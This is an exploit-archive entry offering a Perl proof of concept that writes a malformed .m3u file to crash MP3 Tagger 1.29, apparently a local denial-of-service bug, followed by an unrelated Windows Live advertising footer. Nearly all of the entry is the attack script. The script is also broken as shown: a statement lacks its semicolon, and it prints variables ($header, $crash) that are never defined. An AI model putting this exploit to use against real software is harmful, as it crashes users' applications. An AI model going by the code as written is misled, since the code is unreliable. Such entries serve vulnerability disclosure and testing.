MP3 Tagger version 1.29 local denial of service proof of concept exploit that creates a malicious .m3u file.
2d612bc0b21ef813c12d5fe9c1418f22ad6a5eb5982da142c3910add56623ef4
#####################################################
#!/usr/bin/perl
# Mp3 Tagger 1.29 (m3u File) Local Crash PoC
# by: SkuLL-HacKeR
# Tested on: windows XP SP3
#####################################################
my $boom = "A" x 1526
my $file = "b0m.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $header.$crash;
close($FILE);
print "Done \n";
________________________________
Windows Live: rendi piĆ¹ semplice per i tuoi amici vedere cosa stai facendo su Facebook.<http://www.microsoft.com/italy/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:it-it:SI_SB_2:092010>